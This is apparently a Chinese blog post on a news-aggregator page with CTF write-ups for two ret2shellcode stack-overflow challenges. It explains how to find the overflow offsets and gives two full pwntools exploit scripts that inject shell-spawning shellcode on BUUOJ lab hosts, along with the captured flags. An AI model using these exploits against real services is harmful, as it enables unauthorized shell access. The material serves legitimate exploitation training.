当前位置: 首页 > news >正文

[第十五章][15.3.2 shellcode注入攻击]ret2shellcode+[NewStarCTF 公开赛赛道]ret2shellcode

1、[NewStarCTF 公开赛赛道]ret2shellcode

IDA 反编译看伪代码:

buf = mmap((void *)0x233000, 0x1000uLL, 7, 34, -1, 0LL);

这里直接给了 buf 7 的权限,即可读可写可执行,那么 shellcode 肯定写到 buf 里

buf 的映射地址:0x233000

下面的 v4 存在溢出,那么利用思路就很明显

覆盖返回地址到 buf 地址就可以了

先拿 pwndbg 判断一下偏移:

cyclic 200

我们利用的溢出点在 v4,是第二次的 read,所以第一次随便输,第二次输入测偏移。

aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

拿到返回的报错地址:0x6161616161616168 

查一下偏移:

cyclic -l 0x6161616161616168

到返回地址的偏移是 56

接下来就可以直接写 exp 了:

# @author:My6n
# @time:20250430
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('node5.buuoj.cn',26272)
shellcode = asm(shellcraft.sh())
offset = 56
io.sendline(shellcode)
io.recvuntil('Anything else?\n')
buf_addr = 0x233000
payload = cyclic(offset) + p64(buf_addr)
io.sendline(payload)
io.interactive()

调试信息: 

拿到 flag:flag{8aeab6ad-2924-49cd-a4ca-a8de7ec8c684} 

2、[第十五章][15.3.2 shellcode注入攻击]ret2shellcode

看一下伪代码:

程序会直接输出 v4 的地址,我们将 shellcode 写到 v4,然后溢出返回到 v4 的地址即可

利用思路也很简单,我们测一下偏移:

偏移是 104,再提取一下 v4 的地址就可以了

编写 exp:

# @author:My6n
# @time:20250430
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('node5.buuoj.cn',29764)
offset = 104
shellcode = asm(shellcraft.sh())
io.recvuntil('advance ')
ret_addr = io.recvline()[:14]
print(ret_addr)
ret_addr = int(ret_addr,16)
print(ret_addr)
payload = shellcode.ljust(offset,b'A') + p64(ret_addr)
io.recvuntil('write last things:\n')
io.sendline(payload)
io.interactive()

调试信息: 

拿 flag

flag{711ede95-7327-47f9-b714-f3ff81763509}

相关文章:

  • OLED显示字符串 汉字 图形
  • 腾讯元宝桌面客户端:基于Tauri的开源技术解析
  • 智能驾驶新时代:NVIDIA高级辅助驾驶引领未来出行安全
  • 机器学习_KNN算法
  • 边缘计算:数字世界的”末梢神经系统”解析-优雅草卓伊凡
  • 腾讯云CodeBuddy初体验
  • TwinCAT数据类型,%MX,%MD这些特殊符号
  • 大规模克希霍夫积分法叠前深度偏移中,并行化和旅行时表处理
  • 高效管理远程服务器Termius for Mac 保姆级教程
  • 单片机不同通信方式的适用场景
  • kotlin 过滤 filter 函数的作用和使用场景
  • mmdeploy 转换torch为onnx
  • MVC与MVP设计模式
  • 深度学习概述
  • ​​Steam安装下载及新手注册
  • 【数据链路层深度解析】从帧结构到协议实现
  • C 语 言 - - - 文 件 操 作
  • (4)python中jupyter lab使用python虚拟环境
  • DeepSeek 4月30日发布新模型:DeepSeek-Prover-V2-671B 可进一步降低数学AI应用门槛,推动教育、科研领域的智能化升级
  • 永磁同步电机控制算法--单矢量模型预测电流控制MPCC
  • “五一”假期首日跨区域人员流动预计超3.4亿人次
  • 解放日报:抢占科技制高点,赋能新质生产力
  • 中国空间站多项太空实验已取得成果,未来将陆续开展千余项研究
  • “铁血防守”制造8年最快丢球,恐惧中的阿森纳什么也做不了
  • 铁路上海站今日预计发送旅客65.8万人次,同比增长超16%
  • 人社部:将制定提前领取个人养老金相关办法